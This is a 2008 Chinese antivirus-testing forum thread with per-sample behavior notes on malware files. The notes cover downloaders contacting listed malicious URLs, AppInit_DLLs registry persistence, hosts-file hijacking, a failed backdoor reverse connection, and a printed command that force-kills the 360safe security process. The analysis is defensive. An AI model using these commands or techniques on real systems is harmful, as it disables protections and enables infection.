[font=Times New Roman][size=5][color=red]080821-A2-68.exe[/color][/size][/font][font=宋体]:[size=4]非病毒文件[/size][/font]
[font=Times New Roman][size=5][color=red]080821-A2-82.exe[/color][/size][/font][font=宋体]:[size=4]循环[/size][/font][size=4][font=Times New Roman] 1000. ms[/font][font=宋体]等待事件,不存在陷入死循环[/font][/size]
[font=Times New Roman][size=5][color=red]080821-A2-84.exe[/color][/size][/font][font=宋体]:[size=4]微点报警[/size][/font]
[font=Times New Roman][size=5][color=red]080821-A2-96.exe[/color][/size][/font][font=宋体]:[size=4]流氓软件包[/size][/font]
[size=5][color=blue]080822-1-8.exe[color=#000000]:[size=4]非病毒文件[/size][/color][/color][/size][/font]
[font=宋体][size=5][color=blue]080822-A1-46.exe[/color][/size]:[size=4]非病毒文件[/size]
[size=5][color=blue]080822-A1-85.exe[color=#000000]:[size=4]非病毒文件[/size][/color]
[/color][/size]
[/font]
[font=宋体][/font]
[font=宋体][font=Times New Roman][size=5][color=red]080823-2-6.exe[/color][/size][/font][font=宋体]:拷贝[/font][font=Times New Roman]system32[/font][font=宋体]目录下[/font][font=Times New Roman]advapi32.dll[/font][font=宋体]到临时目录下,释放驱动注册服务,驱动释放动态库文件,延时删除自身(具体行为拦截待处理)[/font]
[font=Times New Roman][/font]
[font=Times New Roman][size=5][color=red]080823-3-6.exe[/color][/size][/font][font=宋体]:非病毒文件[/font]
[font=Times New Roman][size=5][color=red]080823-A1-102.exe[/color][/size][/font][font=宋体]:释放批处理删除自身。[/font]
[font=宋体][font=Times New Roman][size=5][color=blue]080824-A1-89.exe[/color][/size][/font][font=宋体]:非病毒文件[/font]
[font=Times New Roman][/font]
[font=Times New Roman][size=5][color=blue]080824-A1-125.exe[/color][/size][/font][font=宋体]:在链接有效与网络连通的情况下连接[/font][font=Times New Roman]http://t1.05885.cn/[/font][font=宋体]下载其他文件[/font]
[font=Times New Roman][/font]
[font=Times New Roman][size=5][color=blue]080824-A1-150.exe[/color][/size][/font][font=宋体]:以[/font][font=Times New Roman]30000ms[/font][font=宋体]作为循环等待网络连通,在链接有效与网络连通的情况下连接[/font][font=Times New Roman] [url=http://64.247.39.247/confirm.php?]http://64.247.39.247/confirm.php?[/url][/font]
[font=Times New Roman][/font]
[font=Times New Roman][size=5][color=blue]080824-A1-176.exe[/color][/size][/font][font=宋体]:在[/font][font=Times New Roman]system32[/font][font=宋体]目录下释放[/font][font=Times New Roman]fsusbtd.dll[/font][font=宋体],添加注册表启动项[/font][font=Times New Roman] SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows[/font][font=宋体]项下[/font][font=Times New Roman]appinit_dlls[/font][font=宋体]键值中添加[/font][font=Times New Roman]zsqf.dll,ytfa.dll,ytfb.dll,fsusbtd.dll[/font][font=宋体]未成功,在链接有效与网络连通的情况下连接[/font][font=Times New Roman]http://zhuxian.l7173.com/index.shtml[/font][font=宋体]、[/font][font=Times New Roman]http://w2i.l7173.com/index.shtml[/font][font=宋体]、[/font][font=Times New Roman]http://wl.l7173.com/index.shtml[/font][font=宋体]、[/font][font=Times New Roman]http://chibi.l7173.com/index.shtml[/font][font=宋体]、[/font][font=Times New Roman]http://www.l7173.com/index.shtml[/font][font=宋体]等网址,下载[/font][font=Times New Roman]ytfazx.exe[/font][font=宋体]、[/font][font=Times New Roman]ytfagj.exe[/font][font=宋体]、[/font][font=Times New Roman]ytfawl.exe[/font][font=宋体]、[/font][font=Times New Roman]ytfacb.exe[/font][font=宋体]、[/font][font=Times New Roman]TDClient.exe[/font][font=宋体]。[/font]
[font=Times New Roman][/font]
[font=Times New Roman][size=5][color=blue]080824-A1-198.exe[/color][/size][/font][font=宋体]:在[/font][font=Times New Roman]system32[/font][font=宋体]目录下释放[/font][font=Times New Roman]fsusbtd.dll[/font][font=宋体],添加注册表启动项[/font][font=Times New Roman] SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows[/font][font=宋体]项下[/font][font=Times New Roman]appinit_dlls[/font][font=宋体]键值中添加[/font][font=Times New Roman]zsqf.dll,ytfa.dll,ytfb.dll,fsusbtd.dll[/font][font=宋体]未成功,在链接有效与网络连通的情况下连接[/font][font=Times New Roman]http://zhuxian.l7173.com/index.shtml[/font][font=宋体]、[/font][font=Times New Roman]http://w2i.l7173.com/index.shtml[/font][font=宋体]、[/font][font=Times New Roman]http://wl.l7173.com/index.shtml[/font][font=宋体]、[/font][font=Times New Roman]http://chibi.l7173.com/index.shtml[/font][font=宋体]、[/font][font=Times New Roman][url=http://www.l7173.com/index.shtml]http://www.l7173.com/index.shtml[/url][/font][font=宋体]等网址,下载[/font][font=Times New Roman]ytfazx.exe[/font][font=宋体]、[/font][font=Times New Roman]ytfagj.exe[/font][font=宋体]、[/font][font=Times New Roman]ytfawl.exe[/font][font=宋体]、[/font][font=Times New Roman]ytfacb.exe[/font][font=宋体]、[/font][font=Times New Roman]TDClient.exe[/font][font=宋体]。[/font]
[/font]
[/font]
[font=宋体][/font]
[font=宋体][/font]
[font=宋体][font=Times New Roman][size=5][color=red]080825-1-2.exe[/color][/size][/font][font=宋体]:非病毒文件[/font]
[font=Times New Roman][/font]
[font=Times New Roman][size=5][color=red]080825-1-5.exe[/color][/size][/font][font=宋体]:非病毒文件[/font]
[font=Times New Roman][/font]
[font=Times New Roman][/font]
[font=Times New Roman][size=5][color=red]080825-A1-46.exe[/color][/size][/font][font=宋体]:安装包文件,包含安装包[/font][font=Times New Roman]22.exe[/font][font=宋体],[/font][font=Times New Roman]22.exe[/font][font=宋体]删除临时文件夹下[/font][font=Times New Roman]nso**.tmp[/font][font=宋体],在[/font][font=Times New Roman] All Users\Application Data\Microsoft\[/font][font=宋体]目录下创建[/font][font=Times New Roman]PCTools\pctools.dll[/font][font=宋体],微点可以报可疑。[/font]
[font=Times New Roman][/font]
[font=Times New Roman][/font]
[font=Times New Roman][size=5][color=red]080825-A1-63.exe[/color][/size][/font][font=宋体]:被病毒修改过的host文件,非PE格式,重定向多数安全网站网址。[/font]
[font=Times New Roman][/font]
[font=Times New Roman][size=5][color=red]080825-A1-86.exe[/color][/size][/font][font=宋体]:在网络连同与链接有效的情况下连接htp://t1.05885.cn/[url=][/font][font=宋体],[/font][font=Times New Roman][/url]http://t2.05885.cn/[/font][font=宋体]下在其他程序到本地运行。[/font]
[/font]
[font=宋体][/font]
[font=宋体][font=Times New Roman][size=5][color=blue]080826-A1-42.exe[/color][/size][/font][font=宋体]:在网络连通与链接有效的情况下连接[/font][font=Times New Roman]http://t1.05885.cn/[/font][font=宋体]下载其他文件到本地运行。[/font]
[font=Times New Roman] [/font]
[font=Times New Roman][size=5][color=blue]080826-A1-46.exe[/color][/size][/font][font=宋体]:执行命令行[/font][font=Times New Roman]0012FF74 cmd /c taskkill /im 360safe.exe /f[/font][font=宋体],在[/font][font=Times New Roman]system32[/font][font=宋体]目录下释放[/font][font=Times New Roman]abc34.exe[/font][font=宋体],修改[/font][font=Times New Roman]exe[/font][font=宋体]文件关联,设置属性为[/font][font=Times New Roman]HIDDEN|SYSTEM[/font][font=宋体],执行,但存在[/font][font=Times New Roman]bug[/font][font=宋体]。[/font]
[font=Times New Roman] [/font]
[font=Times New Roman] [/font]
[font=Times New Roman] [/font]
[font=Times New Roman][size=5][color=blue]080826-A1-62.exe[/color][/size][/font][font=宋体]:后门反弹连接失效。[/font]
[/font]
[[i] 本帖最后由 啊弥陀佛 于 2008-8-27 15:53 编辑 [/i]] 看看这个月,微点表现怎么样 2008年8月14日
复查图片
shmily512099提供
[attach]334676[/attach]
[[i] 本帖最后由 风吹我走 于 2008-8-14 21:06 编辑 [/i]] 期待一下~ 坏了....第一页没了 加油[:14:] 跳水了[:02:] [:05:]
加油啊 [:03:]
[[i] 本帖最后由 微点卫士 于 2008-8-2 00:27 编辑 [/i]] [quote]原帖由 [i]微点卫士[/i] 于 2008-8-2 00:23 发表 [url=http://bbs.kafan.cn/redirect.php?goto=findpost&pid=4315245&ptid=292025][img]http://bbs.kafan.cn/images/common/back.gif[/img][/url]
[:03:] [/quote]
不错, 看来最新的系统, 还是可以查杀很多 在SP2里未查杀的病毒~~o(∩_∩)o...哈哈~~ SP3 预升级复查 楼上几位辛苦拉~
随时更新复查结果啊~~[:13:] 继续
[[i] 本帖最后由 chengguizi 于 2008-8-2 10:19 编辑 [/i]] 今天的结果不怎么好了[:02:]
[attach]323376[/attach]
运行080808-A2-5杀衍生物
[attach]323390[/attach]
[[i] 本帖最后由 taiw_1144 于 2008-8-2 10:25 编辑 [/i]]